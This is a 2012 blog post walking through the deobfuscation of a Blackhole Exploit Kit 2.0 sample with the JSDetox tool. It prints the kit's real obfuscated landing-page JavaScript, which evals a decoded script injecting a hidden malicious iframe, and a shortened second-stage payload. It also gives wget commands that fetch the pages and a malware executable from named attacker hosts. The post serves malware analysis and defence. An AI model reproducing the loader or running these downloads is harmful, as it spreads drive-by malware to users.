Thursday, September 27, 2012

Analyzing the Blackhole Exploit Kit 2.0 with JSDetox

With the release of the new Blackhole Exploit Kit version, I wanted to check if JSDetox is still able to analyze it. As it turns out, the process is not much different from the last version (shown in this screencast).
I checked http://www.malwaredomainlist.com/update.php to find a current sample. Of course you should not visit those URLs with your normal browser as they contain malware - I will not "hide" those URLs here as they are publicly documented (and seem to be taken offline by now). The same applies for the tool JSDetox, you should run it in an isolated environment.

The obfuscated iframe leading to the exploit kit sounds interesting, so lets use that one:
wget -O pho.htm "basijkarmandan.danaportal.ir/pho.htm"
The downloaded file contains this:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>

<h1><b>Please wait a moment. You will be forwarded...</h1></b>


<script>v="va"+"l";try{ebgserb++;}catch(snregrx){try{gnezrg|326}catch(ztbet){m=Math;ev=window[""+"e"+v];}ff="fromC"+"ha";if(020==0x10)ff+="rCode";n="25&&26&&121&&119&&48&&57&&116&&128&&115&&134&&125&&118&&126&&133&&62&&120&&117&&133&&85&&125&&117&&126&&117&&127&&132&&132&&82&&138&&100&&114&&119&&95&&113&&126&&117&&57&&55&&115&&127&&117&&137&&56&&57&&108&&64&&110&&57&&140&&29&&26&&25&&26&&121&&119&&130&&114&&125&&118&&130&&57&&57&&76&&29&&26&&25&&142&&48&&118&&124&&132&&117&&49&&139&&30&&25&&26&&25&&117&&127&&116&&133&&126&&117&&127&&132&&63&&135&&131&&121&&133&&117&&57&&50&&77&&121&&119&&130&&114&&125&&118&&48&&132&&130&&116&&77&&56&&120&&133&&132&&129&&74&&64&&63&&122&&127&&129&&127&&127&&117&&132&&124&&114&&124&&63&&130&&134&&74&&73&&64&&73&&64&&64&&118&&128&&130&&134&&125&&64&&124&&122&&126&&124&&131&&64&&115&&128&&124&&134&&125&&127&&62&&129&&120&&129&&55&&49&&135&&122&&116&&133&&120&&78&&55&&66&&64&&56&&48&&121&&117&&122&&119&&121&&132&&78&&55&&66&&64&&56&&48&&132&&132&&138&&124&&118&&77&&56&&134&&122&&131&&122&&114&&122&&124&&122&&132&&138&&74&&121&&121&&117&&116&&118&&126&&76&&128&&128&&131&&122&&132&&122&&127&&127&&74&&114&&114&&132&&127&&125&&133&&133&&117&&76&&124&&118&&118&&133&&74&&65&&75&&133&&127&&129&&74&&65&&75&&56&&78&&77&&63&&122&&118&&131&&113&&126&&117&&79&&50&&58&&75&&30&&25&&26&&141&&30&&25&&26&&118&&134&&126&&116&&132&&122&&127&&127&&48&&122&&118&&131&&113&&126&&117&&131&&56&&58&&139&&30&&25&&26&&25&&135&&113&&131&&48&&119&&48&&78&&48&&117&&127&&116&&133&&126&&117&&127&&132&&63&&115&&131&&117&&114&&132&&118&&85&&125&&117&&126&&117&&127&&132&&57&&55&&122&&118&&131&&113&&126&&117&&56&&57&&76&&118&&63&&131&&118&&132&&82&&132&&133&&130&&122&&114&&134&&132&&118&&56&&56&&131&&131&&115&&56&&60&&56&&120&&133&&132&&129&&74&&64&&63&&122&&127&&129&&127&&127&&117&&132&&124&&114&&124&&63&&130&&134&&74&&73&&64&&73&&64&&64&&118&&128&&130&&134&&125&&64&&124&&122&&126&&124&&131&&64&&115&&128&&124&&134&&125&&127&&62&&129&&120&&129&&55&&58&&75&&119&&62&&132&&132&&138&&124&&118&&62&&135&&121&&132&&121&&115&&121&&125&&121&&133&&137&&78&&55&&121&&121&&117&&116&&118&&126&&56&&75&&119&&62&&132&&132&&138&&124&&118&&62&&129&&127&&132&&121&&133&&121&&128&&126&&78&&55&&114&&114&&132&&127&&125&&133&&133&&117&&56&&75&&119&&62&&132&&132&&138&&124&&118&&62&&125&&117&&119&&132&&78&&55&&65&&55&&76&&118&&63&&131&&133&&137&&125&&117&&63&&132&&128&&128&&78&&55&&65&&55&&76&&118&&63&&131&&118&&132&&82&&132&&133&&130&&122&&114&&134&&132&&118&&56&&56&&135&&122&&116&&133&&120&&56&&60&&56&&65&&65&&55&&58&&75&&119&&62&&132&&117&&133&&81&&133&&132&&131&&121&&115&&133&&133&&117&&57&&55&&121&&117&&122&&119&&121&&132&&56&&60&&56&&65&&65&&55&&58&&75&&30&&25&&26&&25&&117&&127&&116&&133&&126&&117&&127&&132&&63&&119&&118&&132&&86&&124&&118&&125&&118&&126&&133&&131&&83&&137&&101&&113&&120&&94&&114&&125&&118&&56&&56&&114&&128&&116&&138&&55&&58&&107&&65&&109&&63&&113&&129&&128&&118&&126&&117&&83&&121&&121&&125&&116&&57&&118&&58&&75&&30&&25&&26&&141".split("&&");h=2;s="";if(m)for(i=0;i-605!=0;i=1+i){k=i;s+=String[ff](n[i]-(020+i%h));}if(020==0x10)ev(s);}</script>

</body>
</html>
Paste the javascript code into the textbox in the "Code Analysis" tab and click "Execute":

The code tries to call "window.eval()" - click "Show Code" to see what would be executed:

Click "Send to Analyze" to view the code in the code analysis tab and click "Analyze" to see a formatted version of the code:

Downloading the content of the created iframe...
wget -O column.php "http://ioponeslal.ru:8080/forum/links/column.php?qqx=3633370907&mwafe=3307093738070736060b&gisvsv=04&zwhltu=uvlnuxbx&knl=utqwoyzf"
This file contains 29kb of data and looks like this (shortened):
<html><body><script>g="getElementById";cc="concat";ss=String.fromCharCode;gg="getAttribute";function asd(){try{(alert+"fewfbw")()}catch(adgsdg){window["e"+"v"+"a"+"l"](s);}}</script><u id="google" 
d0="+4442494b46)3d42142o3o$453j3l3q2c%3h443h3f44*254b463h42$433l3r3q22_161k1i1r1i&20161g3q3d&3p3h22162o!3o453j3l3q!2c3h443h3f)44161g3k3d&3q3g3o3h42$223i453q3f$443l3r3q1c(3f1g3e1g3d#1d4b423h44+45423q143i$453q3f443l_3r3q1c1d4b#3f1c3e1g3d#1d4d4d1g3l@432c3h3i3l@3q3h3g223i!453q3f443l#3r3q1c3e1d+4b423h4445!42" 

[snip]

d91="43#3h1c1d234d%3f3d443f3k_1c3h1d4b4d*4442494b47&3l443k1c42%3d1l1d4b43&3k3h3o3o3h(483h3f4544^3h1c423d1o$1d234d4d3f!3d443f3k1c%3h1d4b4d4d+3f3d443f3k@1c3h1d4b4d#4d3f3d443f#3k1c3h4242!3q3r1d4b4d!3g3r3f453p$3h3q441i47_423l443h1c+1b1b1d2343$3h44303l3p&3h3r45441c%3h3q3g3b42#3h3g3l423h)3f441g1q1k)1k1k1k1d23"></u><script>
a=document[g]("google");
s="";
for(i=0;;i++){
r=a[gg]("d"[cc](i));
if(r){s=s+r;}else break;
}
a=s;
k="";
a=a.replace(/[^0-9a-z]/g,k);
s="";
for(i=0;i<a.length;i+=2){
try{gbargre-0x32}catch(sdgsdg){if(020==0x10)s+=ss(parseInt(a.substr(i,2),0x1c));}
}
asd();
</script></body></html>
The last version of the Blackhole Exploit Kit I analyzed stored the obfuscated data in the text content of HTML attributes, this version uses different attributes of one single HTML element. To analyze this in JSDetox, copy the whole content of the file in the textbox in the "HTML Document" tab and click "Extract Scripts":

You are then taken to the "Code Analysis" tab where you can analyze the code (it is a decoding loop) or directly execute the script:

JSDetox logs that the code executed "document.getElementById" (to access the big HTML element containing the obfuscated code) and that it emulated that access with the imported HTML data. JSDetox then catches a call to "window.eval()" and makes it possible to view the code that would be executed (click "Show Code" and then "Send to Analyze").

Click "Reformat" to make the code readable. At the end of the code, we find this:

Downloading the file:
wget -O cee0c21.exe "http://ioponeslal.ru:8080/forum/links/column.php?qqx=3633370907&mwafe=3307093738070736060b&gisvsv=04&zwhltu=uvlnuxbx&knl=utqwoyzf"
A check on virustotal gives a detection rate of 6/43, a few ours later it was 11/43 with some major vendors still missing it: